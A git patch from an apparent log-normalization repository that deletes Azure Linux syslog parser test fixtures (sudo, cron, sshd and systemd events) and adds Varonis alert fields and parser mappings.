'{{ grok_sudo.result.action_name == "sudo:auth" }}' - name: set - omsagent2: - actions: - - set: - user.name: "{{ omsagent.result.USER}}" - process.command_line: '{{ [grok2_omsagent.result.process_executable, grok2_omsagent.result.process_args]|select|join(" ") }}' - process.executable: "{{ grok2_omsagent.result.process_executable }}" - process.working_directory: "{{ omsagent.result.PWD }}" - name: set - action-outcome: - actions: - - set: - action.outcome: "{{json_event.message.level}}" - name: set - - fallback: success - dictionary: - crit: failure - critical: failure - err: failure - error: failure - mapping: - action.outcome: action.outcome - name: translate diff --git a/Azure/azure-linux/tests/auth_conversation_failed.json b/Azure/azure-linux/tests/auth_conversation_failed.json deleted file mode 100644 index 5a761c66d..000000000 --- a/Azure/azure-linux/tests/auth_conversation_failed.json +++ /dev/null 
@@ -1,28 +0,0 @@ -{ - "input": { - "message": "{ \"time\" : \"2019-07-02T13:45:50.0000000Z\",\"resourceId\" : \"/subscriptions/128ed5ce-4f50-4b5f-a3b0-08233b5a86b6/resourceGroups/demo.sekoia.io/providers/Microsoft.Compute/virtualMachines/LinuxRedhatDesktop\",\"properties\" : {\"ident\" : \"sudo\",\"Ignore\" : \"syslog\",\"Facility\" : \"authpriv\",\"Severity\" : \"err\",\"EventTime\" : \"2019-07-02T13:45:50+0000\",\"SendingHost\" : \"localhost\",\"Msg\" : \"pam_unix(sudo:auth): conversation failed\",\"hostname\" : \"LinuxRedhatDesktop\",\"FluentdIngestTimestamp\" : \"2019-07-02T13:45:50Z\"},\"category\" : \"authpriv\",\"level\" : \"err\",\"operationName\" : \"LinuxSyslogEvent\"}" - }, - "expected": { - "message": "{ \"time\" : \"2019-07-02T13:45:50.0000000Z\",\"resourceId\" : \"/subscriptions/128ed5ce-4f50-4b5f-a3b0-08233b5a86b6/resourceGroups/demo.sekoia.io/providers/Microsoft.Compute/virtualMachines/LinuxRedhatDesktop\",\"properties\" : {\"ident\" : \"sudo\",\"Ignore\" : \"syslog\",\"Facility\" : \"authpriv\",\"Severity\" : \"err\",\"EventTime\" : \"2019-07-02T13:45:50+0000\",\"SendingHost\" : \"localhost\",\"Msg\" : \"pam_unix(sudo:auth): conversation failed\",\"hostname\" : \"LinuxRedhatDesktop\",\"FluentdIngestTimestamp\" : \"2019-07-02T13:45:50Z\"},\"category\" : \"authpriv\",\"level\" : \"err\",\"operationName\" : \"LinuxSyslogEvent\"}", - "event": { - "outcome": "failure" - }, - "@timestamp": "2019-07-02T13:45:50Z", - "action": { - "name": "sudo:auth", - "outcome": "failure", - "type": "open" - }, - "azure_linux": { - "message": "pam_unix(sudo:auth): conversation failed" - }, - "log": { - "hostname": "LinuxRedhatDesktop", - "level": "error" - }, - "os": { - "family": "linux", - "platform": "linux" - } - } -} \ No newline at end of file diff --git a/Azure/azure-linux/tests/auth_no_identity.json b/Azure/azure-linux/tests/auth_no_identity.json deleted file mode 100644 index 1da5be28d..000000000 --- a/Azure/azure-linux/tests/auth_no_identity.json +++ /dev/null 
@@ -1,36 +0,0 @@ -{ - "input": { - "message": "{ \"time\" : \"2019-07-02T13:46:32.0000000Z\",\"resourceId\" : \"/subscriptions/128ed5ce-4f50-4b5f-a3b0-08233b5a86b6/resourceGroups/demo.sekoia.io/providers/Microsoft.Compute/virtualMachines/LinuxRedhatDesktop\",\"properties\" : {\"ident\" : \"sudo\",\"Ignore\" : \"syslog\",\"Facility\" : \"authpriv\",\"Severity\" : \"crit\",\"EventTime\" : \"2019-07-02T13:46:32+0000\",\"SendingHost\" : \"localhost\",\"Msg\" : \"pam_unix(sudo:auth): auth could not identify password for [omsagent]\",\"hostname\" : \"LinuxRedhatDesktop\",\"FluentdIngestTimestamp\" : \"2019-07-02T13:46:32Z\"},\"category\" : \"authpriv\",\"level\" : \"crit\",\"operationName\" : \"LinuxSyslogEvent\"}" - }, - "expected": { - "message": "{ \"time\" : \"2019-07-02T13:46:32.0000000Z\",\"resourceId\" : \"/subscriptions/128ed5ce-4f50-4b5f-a3b0-08233b5a86b6/resourceGroups/demo.sekoia.io/providers/Microsoft.Compute/virtualMachines/LinuxRedhatDesktop\",\"properties\" : {\"ident\" : \"sudo\",\"Ignore\" : \"syslog\",\"Facility\" : \"authpriv\",\"Severity\" : \"crit\",\"EventTime\" : \"2019-07-02T13:46:32+0000\",\"SendingHost\" : \"localhost\",\"Msg\" : \"pam_unix(sudo:auth): auth could not identify password for [omsagent]\",\"hostname\" : \"LinuxRedhatDesktop\",\"FluentdIngestTimestamp\" : \"2019-07-02T13:46:32Z\"},\"category\" : \"authpriv\",\"level\" : \"crit\",\"operationName\" : \"LinuxSyslogEvent\"}", - "event": { - "outcome": "failure" - }, - "@timestamp": "2019-07-02T13:46:32Z", - "action": { - "name": "sudo:auth", - "outcome": "failure", - "type": "open" - }, - "azure_linux": { - "message": "pam_unix(sudo:auth): auth could not identify password for [omsagent]" - }, - "log": { - "hostname": "LinuxRedhatDesktop", - "level": "critical" - }, - "os": { - "family": "linux", - "platform": "linux" - }, - "related": { - "user": [ - "omsagent" - ] - }, - "user": { - "name": "omsagent" - } - } -} \ No newline at end of file 
diff --git a/Azure/azure-linux/tests/cron_command1.json b/Azure/azure-linux/tests/cron_command1.json
deleted file mode 100644
index eef0c8095..000000000
--- a/Azure/azure-linux/tests/cron_command1.json
+++ /dev/null
@@ -1,35 +0,0 @@ -{ - "input": { - "message": "{ \"time\" : \"2019-06-27T14:50:01.0000000Z\",\"resourceId\" : \"/subscriptions/128ed5ce-4f50-4b5f-a3b0-08233b5a86b6/resourceGroups/demo.sekoia.io/providers/Microsoft.Compute/virtualMachines/LinuxRedhatDesktop\",\"properties\" : {\"ident\" : \"CROND\",\"pid\" : \"21188\",\"Ignore\" : \"syslog\",\"Facility\" : \"cron\",\"Severity\" : \"info\",\"EventTime\" : \"2019-06-27T14:50:01+0000\",\"SendingHost\" : \"localhost\",\"Msg\" : \"(root) CMD (/usr/lib64/sa/sa1 1 1)\",\"hostname\" : \"LinuxRedhatDesktop\",\"FluentdIngestTimestamp\" : \"2019-06-27T14:50:01Z\"},\"category\" : \"cron\",\"level\" : \"info\",\"operationName\" : \"LinuxSyslogEvent\"}" - }, - "expected": { - "message": "{ \"time\" : \"2019-06-27T14:50:01.0000000Z\",\"resourceId\" : \"/subscriptions/128ed5ce-4f50-4b5f-a3b0-08233b5a86b6/resourceGroups/demo.sekoia.io/providers/Microsoft.Compute/virtualMachines/LinuxRedhatDesktop\",\"properties\" : {\"ident\" : \"CROND\",\"pid\" : \"21188\",\"Ignore\" : \"syslog\",\"Facility\" : \"cron\",\"Severity\" : \"info\",\"EventTime\" : \"2019-06-27T14:50:01+0000\",\"SendingHost\" : \"localhost\",\"Msg\" : \"(root) CMD (/usr/lib64/sa/sa1 1 1)\",\"hostname\" : \"LinuxRedhatDesktop\",\"FluentdIngestTimestamp\" : \"2019-06-27T14:50:01Z\"},\"category\" : \"cron\",\"level\" : \"info\",\"operationName\" : \"LinuxSyslogEvent\"}", - "@timestamp": "2019-06-27T14:50:01Z", - "azure_linux": { - "message": "(root) CMD (/usr/lib64/sa/sa1 1 1)" - }, - "log": { - "hostname": "LinuxRedhatDesktop", - "level": "info" - }, - "os": { - "family": "linux", - "platform": "linux" - }, - "process": { - "command_line": "/usr/lib64/sa/sa1 1 1", - "executable": "/usr/lib64/sa/sa1", - "parent": { - "pid": 21188 - } - }, - "related": { - "user": [ - "root" - ] - }, - "user": { - "name": "root" - } - } -} \ No newline at end of file 
diff --git a/Azure/azure-linux/tests/cron_command2.json b/Azure/azure-linux/tests/cron_command2.json
deleted file mode 100644
index b7cc4940a..000000000
--- a/Azure/azure-linux/tests/cron_command2.json
+++ /dev/null
@@ -1,34 +0,0 @@ -{ - "input": { - "message": "{ \"time\" : \"2019-06-27T14:29:01.0000000Z\",\"resourceId\" : \"/subscriptions/128ed5ce-4f50-4b5f-a3b0-08233b5a86b6/resourceGroups/demo.sekoia.io/providers/Microsoft.Compute/virtualMachines/LinuxRedhatDesktop\",\"properties\" : {\"ident\" : \"CROND\",\"pid\" : \"16373\",\"Ignore\" : \"syslog\",\"Facility\" : \"cron\",\"Severity\" : \"info\",\"EventTime\" : \"2019-06-27T14:29:01+0000\",\"SendingHost\" : \"localhost\",\"Msg\" : \"(root) CMD ([ -f /etc/krb5.keytab ] && [ \\\\( ! -f /etc/opt/omi/creds/omi.keytab \\\\) -o \\\\( /etc/krb5.keytab -nt /etc/opt/omi/creds/omi.keytab \\\\) ] && /opt/omi/bin/support/ktstrip /etc/krb5.keytab /etc/opt/omi/creds/omi.keytab >/dev/null 2>&1 || true)\",\"hostname\" : \"LinuxRedhatDesktop\",\"FluentdIngestTimestamp\" : \"2019-06-27T14:29:01Z\"},\"category\" : \"cron\",\"level\" : \"info\",\"operationName\" : \"LinuxSyslogEvent\"}" - }, - "expected": { - "message": "{ \"time\" : \"2019-06-27T14:29:01.0000000Z\",\"resourceId\" : \"/subscriptions/128ed5ce-4f50-4b5f-a3b0-08233b5a86b6/resourceGroups/demo.sekoia.io/providers/Microsoft.Compute/virtualMachines/LinuxRedhatDesktop\",\"properties\" : {\"ident\" : \"CROND\",\"pid\" : \"16373\",\"Ignore\" : \"syslog\",\"Facility\" : \"cron\",\"Severity\" : \"info\",\"EventTime\" : \"2019-06-27T14:29:01+0000\",\"SendingHost\" : \"localhost\",\"Msg\" : \"(root) CMD ([ -f /etc/krb5.keytab ] && [ \\\\( ! -f /etc/opt/omi/creds/omi.keytab \\\\) -o \\\\( /etc/krb5.keytab -nt /etc/opt/omi/creds/omi.keytab \\\\) ] && /opt/omi/bin/support/ktstrip /etc/krb5.keytab /etc/opt/omi/creds/omi.keytab >/dev/null 2>&1 || true)\",\"hostname\" : \"LinuxRedhatDesktop\",\"FluentdIngestTimestamp\" : \"2019-06-27T14:29:01Z\"},\"category\" : \"cron\",\"level\" : \"info\",\"operationName\" : \"LinuxSyslogEvent\"}", - "@timestamp": "2019-06-27T14:29:01Z", - "azure_linux": { - "message": "(root) CMD ([ -f /etc/krb5.keytab ] && [ \\( ! 
-f /etc/opt/omi/creds/omi.keytab \\) -o \\( /etc/krb5.keytab -nt /etc/opt/omi/creds/omi.keytab \\) ] && /opt/omi/bin/support/ktstrip /etc/krb5.keytab /etc/opt/omi/creds/omi.keytab >/dev/null 2>&1 || true)" - }, - "log": { - "hostname": "LinuxRedhatDesktop", - "level": "info" - }, - "os": { - "family": "linux", - "platform": "linux" - }, - "process": { - "command_line": "[ -f /etc/krb5.keytab ] && [ \\( ! -f /etc/opt/omi/creds/omi.keytab \\) -o \\( /etc/krb5.keytab -nt /etc/opt/omi/creds/omi.keytab \\) ] && /opt/omi/bin/support/ktstrip /etc/krb5.keytab /etc/opt/omi/creds/omi.keytab >/dev/null 2>&1 || true", - "parent": { - "pid": 16373 - } - }, - "related": { - "user": [ - "root" - ] - }, - "user": { - "name": "root" - } - } -} \ No newline at end of file diff --git a/Azure/azure-linux/tests/disconnected.json b/Azure/azure-linux/tests/disconnected.json deleted file mode 100644 index a845afb3b..000000000 --- a/Azure/azure-linux/tests/disconnected.json +++ /dev/null 
@@ -1,33 +0,0 @@ -{ - "input": { - "message": "{ \"time\" : \"2019-06-27T14:50:51.0000000Z\",\"resourceId\" : \"/subscriptions/128ed5ce-4f50-4b5f-a3b0-08233b5a86b6/resourceGroups/demo.sekoia.io/providers/Microsoft.Compute/virtualMachines/LinuxRedhatDesktop\",\"properties\" : {\"ident\" : \"sshd\",\"pid\" : \"14020\",\"Ignore\" : \"syslog\",\"Facility\" : \"authpriv\",\"Severity\" : \"info\",\"EventTime\" : \"2019-06-27T14:50:51+0000\",\"SendingHost\" : \"localhost\",\"Msg\" : \"Received disconnect from 185.122.161.248 port 39070:11: disconnected by user\",\"hostname\" : \"LinuxRedhatDesktop\",\"FluentdIngestTimestamp\" : \"2019-06-27T14:50:51Z\"},\"category\" : \"authpriv\",\"level\" : \"info\",\"operationName\" : \"LinuxSyslogEvent\"}" - }, - "expected": { - "message": "{ \"time\" : \"2019-06-27T14:50:51.0000000Z\",\"resourceId\" : \"/subscriptions/128ed5ce-4f50-4b5f-a3b0-08233b5a86b6/resourceGroups/demo.sekoia.io/providers/Microsoft.Compute/virtualMachines/LinuxRedhatDesktop\",\"properties\" : {\"ident\" : \"sshd\",\"pid\" : \"14020\",\"Ignore\" : \"syslog\",\"Facility\" : \"authpriv\",\"Severity\" : \"info\",\"EventTime\" : \"2019-06-27T14:50:51+0000\",\"SendingHost\" : \"localhost\",\"Msg\" : \"Received disconnect from 185.122.161.248 port 39070:11: disconnected by user\",\"hostname\" : \"LinuxRedhatDesktop\",\"FluentdIngestTimestamp\" : \"2019-06-27T14:50:51Z\"},\"category\" : \"authpriv\",\"level\" : \"info\",\"operationName\" : \"LinuxSyslogEvent\"}", - "@timestamp": "2019-06-27T14:50:51Z", - "azure_linux": { - "message": "Received disconnect from 185.122.161.248 port 39070:11: disconnected by user" - }, - "log": { - "hostname": "LinuxRedhatDesktop", - "level": "info" - }, - "os": { - "family": "linux", - "platform": "linux" - }, - "process": { - "pid": 14020 - }, - "related": { - "ip": [ - "185.122.161.248" - ] - }, - "source": { - "address": "185.122.161.248", - "ip": "185.122.161.248", - "port": 39070 - } - } -} \ No newline at end of file 
diff --git a/Azure/azure-linux/tests/omsagent_command.json b/Azure/azure-linux/tests/omsagent_command.json
deleted file mode 100644
index 9b96a06aa..000000000
--- a/Azure/azure-linux/tests/omsagent_command.json
+++ /dev/null
@@ -1,39 +0,0 @@ -{ - "input": { - "message": "{ \"time\" : \"2019-06-27T14:48:18.0000000Z\",\"resourceId\" : \"/subscriptions/128ed5ce-4f50-4b5f-a3b0-08233b5a86b6/resourceGroups/demo.sekoia.io/providers/Microsoft.Compute/virtualMachines/LinuxRedhatDesktop\",\"properties\" : {\"ident\" : \"sudo\",\"Ignore\" : \"syslog\",\"Facility\" : \"authpriv\",\"Severity\" : \"notice\",\"EventTime\" : \"2019-06-27T14:48:18+0000\",\"SendingHost\" : \"localhost\",\"Msg\" : \"omsagent : TTY=unknown ; PWD=/opt/microsoft/omsconfig/Scripts/2.6x-2.7x ; USER=root ; COMMAND=/opt/microsoft/omsconfig/Scripts/OMSYumUpdates.sh\",\"hostname\" : \"LinuxRedhatDesktop\",\"FluentdIngestTimestamp\" : \"2019-06-27T14:48:18Z\"},\"category\" : \"authpriv\",\"level\" : \"notice\",\"operationName\" : \"LinuxSyslogEvent\"}" - }, - "expected": { - "message": "{ \"time\" : \"2019-06-27T14:48:18.0000000Z\",\"resourceId\" : \"/subscriptions/128ed5ce-4f50-4b5f-a3b0-08233b5a86b6/resourceGroups/demo.sekoia.io/providers/Microsoft.Compute/virtualMachines/LinuxRedhatDesktop\",\"properties\" : {\"ident\" : \"sudo\",\"Ignore\" : \"syslog\",\"Facility\" : \"authpriv\",\"Severity\" : \"notice\",\"EventTime\" : \"2019-06-27T14:48:18+0000\",\"SendingHost\" : \"localhost\",\"Msg\" : \"omsagent : TTY=unknown ; PWD=/opt/microsoft/omsconfig/Scripts/2.6x-2.7x ; USER=root ; COMMAND=/opt/microsoft/omsconfig/Scripts/OMSYumUpdates.sh\",\"hostname\" : \"LinuxRedhatDesktop\",\"FluentdIngestTimestamp\" : \"2019-06-27T14:48:18Z\"},\"category\" : \"authpriv\",\"level\" : \"notice\",\"operationName\" : \"LinuxSyslogEvent\"}", - "event": { - "outcome": "success" - }, - "@timestamp": "2019-06-27T14:48:18Z", - "action": { - "outcome": "success" - }, - "azure_linux": { - "message": "omsagent : TTY=unknown ; PWD=/opt/microsoft/omsconfig/Scripts/2.6x-2.7x ; USER=root ; COMMAND=/opt/microsoft/omsconfig/Scripts/OMSYumUpdates.sh" - }, - "log": { - "hostname": "LinuxRedhatDesktop", - "level": "info" - }, - "os": { - "family": "linux", - 
"platform": "linux" - }, - "process": { - "command_line": "/opt/microsoft/omsconfig/Scripts/OMSYumUpdates.sh", - "executable": "/opt/microsoft/omsconfig/Scripts/OMSYumUpdates.sh", - "working_directory": "/opt/microsoft/omsconfig/Scripts/2.6x-2.7x" - }, - "related": { - "user": [ - "root" - ] - }, - "user": { - "name": "root" - } - } -} \ No newline at end of file diff --git a/Azure/azure-linux/tests/omsagent_command2.json b/Azure/azure-linux/tests/omsagent_command2.json deleted file mode 100644 index 8839131bd..000000000 --- a/Azure/azure-linux/tests/omsagent_command2.json +++ /dev/null 
@@ -1,39 +0,0 @@ -{ - "input": { - "message": "{ \"time\" : \"2019-07-02T13:46:15.0000000Z\",\"resourceId\" : \"/subscriptions/128ed5ce-4f50-4b5f-a3b0-08233b5a86b6/resourceGroups/demo.sekoia.io/providers/Microsoft.Compute/virtualMachines/LinuxRedhatDesktop\",\"properties\" : {\"ident\" : \"sudo\",\"Ignore\" : \"syslog\",\"Facility\" : \"authpriv\",\"Severity\" : \"notice\",\"EventTime\" : \"2019-07-02T13:46:15+0000\",\"SendingHost\" : \"localhost\",\"Msg\" : \"omsagent : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/bin/test -r /var/lib/docker/containers/bf64bddcdb7d18a3090980d2539e2c15c924138f489c280871941064850f7d16/bf64bddcdb7d18a3090980d2539e2c15c924138f489c280871941064850f7d16-json.log\",\"hostname\" : \"LinuxRedhatDesktop\",\"FluentdIngestTimestamp\" : \"2019-07-02T13:46:15Z\"},\"category\" : \"authpriv\",\"level\" : \"notice\",\"operationName\" : \"LinuxSyslogEvent\"}" - }, - "expected": { - "message": "{ \"time\" : \"2019-07-02T13:46:15.0000000Z\",\"resourceId\" : \"/subscriptions/128ed5ce-4f50-4b5f-a3b0-08233b5a86b6/resourceGroups/demo.sekoia.io/providers/Microsoft.Compute/virtualMachines/LinuxRedhatDesktop\",\"properties\" : {\"ident\" : \"sudo\",\"Ignore\" : \"syslog\",\"Facility\" : \"authpriv\",\"Severity\" : \"notice\",\"EventTime\" : \"2019-07-02T13:46:15+0000\",\"SendingHost\" : \"localhost\",\"Msg\" : \"omsagent : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/bin/test -r /var/lib/docker/containers/bf64bddcdb7d18a3090980d2539e2c15c924138f489c280871941064850f7d16/bf64bddcdb7d18a3090980d2539e2c15c924138f489c280871941064850f7d16-json.log\",\"hostname\" : \"LinuxRedhatDesktop\",\"FluentdIngestTimestamp\" : \"2019-07-02T13:46:15Z\"},\"category\" : \"authpriv\",\"level\" : \"notice\",\"operationName\" : \"LinuxSyslogEvent\"}", - "event": { - "outcome": "success" - }, - "@timestamp": "2019-07-02T13:46:15Z", - "action": { - "outcome": "success" - }, - "azure_linux": { - "message": "omsagent : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/bin/test -r 
/var/lib/docker/containers/bf64bddcdb7d18a3090980d2539e2c15c924138f489c280871941064850f7d16/bf64bddcdb7d18a3090980d2539e2c15c924138f489c280871941064850f7d16-json.log" - }, - "log": { - "hostname": "LinuxRedhatDesktop", - "level": "info" - }, - "os": { - "family": "linux", - "platform": "linux" - }, - "process": { - "command_line": "/bin/test -r /var/lib/docker/containers/bf64bddcdb7d18a3090980d2539e2c15c924138f489c280871941064850f7d16/bf64bddcdb7d18a3090980d2539e2c15c924138f489c280871941064850f7d16-json.log", - "executable": "/bin/test", - "working_directory": "/" - }, - "related": { - "user": [ - "root" - ] - }, - "user": { - "name": "root" - } - } -} \ No newline at end of file diff --git a/Azure/azure-linux/tests/session_closed.json b/Azure/azure-linux/tests/session_closed.json deleted file mode 100644 index 824820fff..000000000 --- a/Azure/azure-linux/tests/session_closed.json +++ /dev/null 
@@ -1,36 +0,0 @@ -{ - "input": { - "message": "{ \"time\" : \"2019-06-27T14:48:28.0000000Z\",\"resourceId\" : \"/subscriptions/128ed5ce-4f50-4b5f-a3b0-08233b5a86b6/resourceGroups/demo.sekoia.io/providers/Microsoft.Compute/virtualMachines/LinuxRedhatDesktop\",\"properties\" : {\"ident\" : \"sudo\",\"Ignore\" : \"syslog\",\"Facility\" : \"authpriv\",\"Severity\" : \"info\",\"EventTime\" : \"2019-06-27T14:48:28+0000\",\"SendingHost\" : \"localhost\",\"Msg\" : \"pam_unix(sudo:session): session closed for user root\",\"hostname\" : \"LinuxRedhatDesktop\",\"FluentdIngestTimestamp\" : \"2019-06-27T14:48:28Z\"},\"category\" : \"authpriv\",\"level\" : \"info\",\"operationName\" : \"LinuxSyslogEvent\"}" - }, - "expected": { - "message": "{ \"time\" : \"2019-06-27T14:48:28.0000000Z\",\"resourceId\" : \"/subscriptions/128ed5ce-4f50-4b5f-a3b0-08233b5a86b6/resourceGroups/demo.sekoia.io/providers/Microsoft.Compute/virtualMachines/LinuxRedhatDesktop\",\"properties\" : {\"ident\" : \"sudo\",\"Ignore\" : \"syslog\",\"Facility\" : \"authpriv\",\"Severity\" : \"info\",\"EventTime\" : \"2019-06-27T14:48:28+0000\",\"SendingHost\" : \"localhost\",\"Msg\" : \"pam_unix(sudo:session): session closed for user root\",\"hostname\" : \"LinuxRedhatDesktop\",\"FluentdIngestTimestamp\" : \"2019-06-27T14:48:28Z\"},\"category\" : \"authpriv\",\"level\" : \"info\",\"operationName\" : \"LinuxSyslogEvent\"}", - "event": { - "outcome": "success" - }, - "@timestamp": "2019-06-27T14:48:28Z", - "action": { - "name": "sudo:session", - "outcome": "success", - "type": "close" - }, - "azure_linux": { - "message": "pam_unix(sudo:session): session closed for user root" - }, - "log": { - "hostname": "LinuxRedhatDesktop", - "level": "info" - }, - "os": { - "family": "linux", - "platform": "linux" - }, - "related": { - "user": [ - "root" - ] - }, - "user": { - "name": "root" - } - } -} \ No newline at end of file 
diff --git a/Azure/azure-linux/tests/session_opened.json b/Azure/azure-linux/tests/session_opened.json
deleted file mode 100644
index 217cca4c3..000000000
--- a/Azure/azure-linux/tests/session_opened.json
+++ /dev/null
@@ -1,36 +0,0 @@ -{ - "input": { - "message": "{ \"time\" : \"2019-06-27T14:48:28.0000000Z\",\"resourceId\" : \"/subscriptions/128ed5ce-4f50-4b5f-a3b0-08233b5a86b6/resourceGroups/demo.sekoia.io/providers/Microsoft.Compute/virtualMachines/LinuxRedhatDesktop\",\"properties\" : {\"ident\" : \"sudo\",\"Ignore\" : \"syslog\",\"Facility\" : \"authpriv\",\"Severity\" : \"info\",\"EventTime\" : \"2019-06-27T14:48:28+0000\",\"SendingHost\" : \"localhost\",\"Msg\" : \"pam_unix(sudo:session): session opened for user root by (uid=0)\",\"hostname\" : \"LinuxRedhatDesktop\",\"FluentdIngestTimestamp\" : \"2019-06-27T14:48:28Z\"},\"category\" : \"authpriv\",\"level\" : \"info\",\"operationName\" : \"LinuxSyslogEvent\"}" - }, - "expected": { - "message": "{ \"time\" : \"2019-06-27T14:48:28.0000000Z\",\"resourceId\" : \"/subscriptions/128ed5ce-4f50-4b5f-a3b0-08233b5a86b6/resourceGroups/demo.sekoia.io/providers/Microsoft.Compute/virtualMachines/LinuxRedhatDesktop\",\"properties\" : {\"ident\" : \"sudo\",\"Ignore\" : \"syslog\",\"Facility\" : \"authpriv\",\"Severity\" : \"info\",\"EventTime\" : \"2019-06-27T14:48:28+0000\",\"SendingHost\" : \"localhost\",\"Msg\" : \"pam_unix(sudo:session): session opened for user root by (uid=0)\",\"hostname\" : \"LinuxRedhatDesktop\",\"FluentdIngestTimestamp\" : \"2019-06-27T14:48:28Z\"},\"category\" : \"authpriv\",\"level\" : \"info\",\"operationName\" : \"LinuxSyslogEvent\"}", - "event": { - "outcome": "success" - }, - "@timestamp": "2019-06-27T14:48:28Z", - "action": { - "name": "sudo:session", - "outcome": "success", - "type": "open" - }, - "azure_linux": { - "message": "pam_unix(sudo:session): session opened for user root by (uid=0)" - }, - "log": { - "hostname": "LinuxRedhatDesktop", - "level": "info" - }, - "os": { - "family": "linux", - "platform": "linux" - }, - "related": { - "user": [ - "root" - ] - }, - "user": { - "name": "root" - } - } -} \ No newline at end of file 
diff --git a/Azure/azure-linux/tests/systemd_session.json b/Azure/azure-linux/tests/systemd_session.json
deleted file mode 100644
index b84c4700d..000000000
--- a/Azure/azure-linux/tests/systemd_session.json
+++ /dev/null
@@ -1,36 +0,0 @@
-{
- "input": {
- "message": "{ \"time\" : \"2019-07-02T14:15:01.0000000Z\",\"resourceId\": \"/subscriptions/128ed5ce-4f50-4b5f-a3b0-08233b5a86b6/resourceGroups/demo.sekoia.io/providers/Microsoft.Compute/virtualMachines/LinuxRedhatDesktop\",\"properties\" : {\"ident\" : \"systemd\",\"Ignore\" : \"syslog\",\"Facility\" : \"daemon\",\"Severity\" : \"info\",\"EventTime\" : \"2019-07-02T14:15:01+0000\",\"SendingHost\": \"localhost\",\"Msg\" : \"Started Session 13124 of user omsagent.\",\"hostname\": \"LinuxRedhatDesktop\",\"FluentdIngestTimestamp\" : \"2019-07-02T14:15:01Z\"},\"category\" : \"daemon\",\"level\" : \"info\",\"operationName\" : \"LinuxSyslogEvent\"}"
- },
- "expected": {
- "message": "{ \"time\" : \"2019-07-02T14:15:01.0000000Z\",\"resourceId\": \"/subscriptions/128ed5ce-4f50-4b5f-a3b0-08233b5a86b6/resourceGroups/demo.sekoia.io/providers/Microsoft.Compute/virtualMachines/LinuxRedhatDesktop\",\"properties\" : {\"ident\" : \"systemd\",\"Ignore\" : \"syslog\",\"Facility\" : \"daemon\",\"Severity\" : \"info\",\"EventTime\" : \"2019-07-02T14:15:01+0000\",\"SendingHost\": \"localhost\",\"Msg\" : \"Started Session 13124 of user omsagent.\",\"hostname\": \"LinuxRedhatDesktop\",\"FluentdIngestTimestamp\" : \"2019-07-02T14:15:01Z\"},\"category\" : \"daemon\",\"level\" : \"info\",\"operationName\" : \"LinuxSyslogEvent\"}",
- "event": {
- "outcome": "success"
- },
- "@timestamp": "2019-07-02T14:15:01Z",
- "action": {
- "name": "systemd:session",
- "outcome": "success",
- "type": "open"
- },
- "azure_linux": {
- "message": "Started Session 13124 of user omsagent."
- },
- "log": {
- "hostname": "LinuxRedhatDesktop",
- "level": "info"
- },
- "os": {
- "family": "linux",
- "platform": "linux"
- },
- "related": {
- "user": [
- "omsagent"
- ]
- },
- "user": {
- "name": "omsagent"
- }
- }
-}
\ No newline at end of file
From 189e914f5e7eec43a1f89f1f1342dbad25b17cad Mon Sep 17 00:00:00 2001
From: LenaigKaliou Date: Thu, 17 Oct 2024 11:15:17 +0200 Subject: [PATCH 160/317] fix/Varonis : Addition of new fields to improve detection --- .../varonis-data-security/_meta/fields.yml | 15 ++++ .../varonis-data-security/ingest/parser.yml | 28 ++++++- .../tests/test_intrusion.json | 74 +++++++++++++++++++ .../tests/test_network_alert.json | 2 +- 4 files changed, 115 insertions(+), 4 deletions(-) create mode 100644 Varonis/varonis-data-security/tests/test_intrusion.json diff --git a/Varonis/varonis-data-security/_meta/fields.yml b/Varonis/varonis-data-security/_meta/fields.yml index a01ff08c2..3711ca72c 100644 --- a/Varonis/varonis-data-security/_meta/fields.yml +++ b/Varonis/varonis-data-security/_meta/fields.yml @@ -1,3 +1,13 @@ +varonis.datalert.description: + description: The description of the triggered alert. + name: varonis.datalert.description + type: keyword + +varonis.datalert.destination.device: + description: The destination device name. + name: varonis.datalert.destination.device + type: keyword + varonis.datalert.file.old_permission: description: The permissions before the change. Data is not collected for all event types. @@ -30,3 +40,8 @@ varonis.datalert.outcome: description: Whether the event which triggered the alert succeeded or failed. name: varonis.datalert.outcome type: keyword + +varonis.datalert.rule.storyline: + description: The rule storyline of the triggered alert. + name: varonis.datalert.rule.storyline + type: keyword diff --git a/Varonis/varonis-data-security/ingest/parser.yml b/Varonis/varonis-data-security/ingest/parser.yml index 58cbbc6af..c66b8b4c2 100644 --- a/Varonis/varonis-data-security/ingest/parser.yml +++ b/Varonis/varonis-data-security/ingest/parser.yml 
@@ -63,7 +63,7 @@ stages: event.kind: "alert" event.category: > [ - {% if parsed_event.message.cs1 != null %}"email"{% else %}"network"{% endif %} + {% if parsed_event.message.cs1 != null %}"email"{% elif parsed_event.message.AlertCategory == "Intrusion" %}"intrusion_detection"{% else %}"network"{% endif %} ] event.type: ["info"] @@ -76,19 +76,34 @@ stages: set_cef_extension_fields: actions: - set: + destination.ip: "{{parsed_event.message.DestinationDip}}" + destination.user.name: "{{parsed_event.message.AffectedObjectSAM}}" + destination.user.domain: "{{parsed_event.message.AffectedObjectDomain}}" + event.dataset: "{{parsed_event.message.cat}}" event.action: "{{parsed_event.message.act}}" event.end: "{{parse_end_date.date}}" rule.name: "{{parsed_event.message.cn1}}" - rule.description: "{{parsed_event.message.cs2}}" + rule.description: "{{parsed_event.message.DescriptionRule or parsed_event.message.cs2}}" - user.name: "{{parsed_event.message.duser}}" + user.name: "{{parsed_event.message.duser.split('\\\\')[-1]}}" host.name: "{{parsed_event.message.dhost}}" file.path: "{{parsed_event.message.filePath}}" file.name: "{{parsed_event.message.fname}}" + source.domain: "{{parsed_event.message.dvchost}}" + source.user.name: "{{parsed_event.message.ActingObjectSAM}}" + source.user.domain: "{{parsed_event.message.ActingObjectDomaineName}}" + + - set: + rule.name: "{{parsed_event.message.cs2}}" + filter: "{{parsed_event.message.cs2Label == 'RuleName'}}" + + - set: + rule.id: "{{parsed_event.message.cn1}}" + filter: "{{parsed_event.message.cn1Label == 'RuleID' and parsed_event.message.cn1 | int > 0}}" - set: event.severity: "{{parsed_event.message.Severity}}" @@ -105,6 +120,10 @@ stages: event.url: "{{parsed_event.message.cs4}}" filter: "{{parsed_event.message.cs4 != null}}" + - set: + user.domain: "{{parsed_event.message.duser.split('\\\\')[0]}}" + filter: "{{parsed_event.message.duser.split('\\\\') | length > 1}}" + - set: email.attachments: > [ 
